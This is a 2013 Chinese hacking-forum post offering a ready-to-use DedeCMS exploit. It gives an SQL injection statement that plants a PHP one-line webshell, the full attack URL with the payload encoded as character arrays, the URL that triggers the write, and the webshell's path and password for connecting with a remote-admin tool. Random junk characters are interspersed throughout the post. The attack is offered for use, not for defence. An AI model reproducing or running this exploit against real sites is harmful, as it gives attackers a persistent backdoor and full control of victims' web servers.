找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2585|回复: 0
打印 上一主题 下一主题

dedecms漏洞getshell EXP最新

[复制链接]
跳转到指定楼层
楼主
发表于 2013-6-10 16:49:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本帖最后由 土豆 于 2013-6-10 14:41 编辑 6 b% m5 c' s- D) j1 w5 s0 a+ X
: t# {% @4 ^6 T9 s: y* K. s
5 I# U4 @6 ^2 k" \4 c
作者:鬼哥
# Q* z, f0 q  `/ F' Z
) I" c9 ?6 q& [- Q+ Q- ?7 q看贴不回,没JJ
- u8 `. u# G7 P* g6 \& N6 v+ ]$ c& B) J1 C4 s. \# q0 I
漏洞大家都知道是哪个。1 n2 C  ^) W0 S% A

% H9 e4 }6 ]( \6 M7 t其实我一直在玩。。郁闷 虽然这个漏洞不是我第一个发现的,以前也是朋友告诉我。# n" y) }4 U; p+ B3 ]4 M3 J! N

7 |7 J- w6 k8 E9 c但是没公开。我承认想自己留着玩。。以前这个漏洞应该很多人知道没发出来而已。
- c4 X0 s* s5 l; v1 M. c6 H9 a; k1 t3 V' B; n
刚看了出的几个exp .. 进后台。还得找后台路径 太麻烦了吧?
- }. K+ ]8 Q# @1 X! ]! }( U& r0 c, b) n3 J8 ^/ C$ m; F
getshell 很容易 。 既然刚发出来的是 sql方法getshell  我也看到几个人发了sql增加表mytag的内容。+ b: h# X( a2 f3 u: s
; K. j, i( Q! I. V" G9 [0 L
但是测试了下。。失败
# I( i6 O; z; c! |5 @
: d( J) @  {8 E0 ]) C原因: 用的语句是update  很多站 mytag 里面都没内容。那么你用update 那有什么用 修改不了任何数据。只能用 INSERT 当然,语句带#就会暴  错误。。现在要做的饶过即可。以前也出过那么多dede sql 结合饶过,成功INSERT。/ ]9 h( T2 O" E/ y4 g( ^

- d3 X/ u6 j9 j  v构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\'`,'{dede:php}file_put_contents(''90sec.php'',''<?php eval($_POST[guige]);?>'');{/dede:php}') # @`\'`
% o% a0 o  y2 k) N' `- i* T$ q5 F8 P* a
EXP:
4 W& W- k: w4 l" t% A/ L9 Y. d* K. [1 i" Y3 {  B/ q0 y! S, A1 g
http://www.xxx.com/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96: R" ^# `2 b6 ]7 b% c" U4 }* ^( W0 A
" ^0 I* i+ w6 m4 O& o& ~* Z) e

* Y1 H9 I" n; T成功增加。3 l3 ?, g6 p8 `& ]2 P2 j# @

* t" C, `6 X5 @+ a  g. f访问http://www.xxx.com/plus/mytag_js.php?aid=9013
! v- x' ]) a$ U生成一句话木马.! ~1 M' f7 l0 _0 P1 J) |& v
菜刀连接 http://www.xxx.com/plus/90sec.php  密码 guige7 X. D7 t! n) ?

# B$ P) l! w" o* |, {测试OK。
2 w) M8 V  Z% Z& A, D
$ f  ^8 C+ }& W( M, S6 @
, {( k: N3 H6 ]; P+ R
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表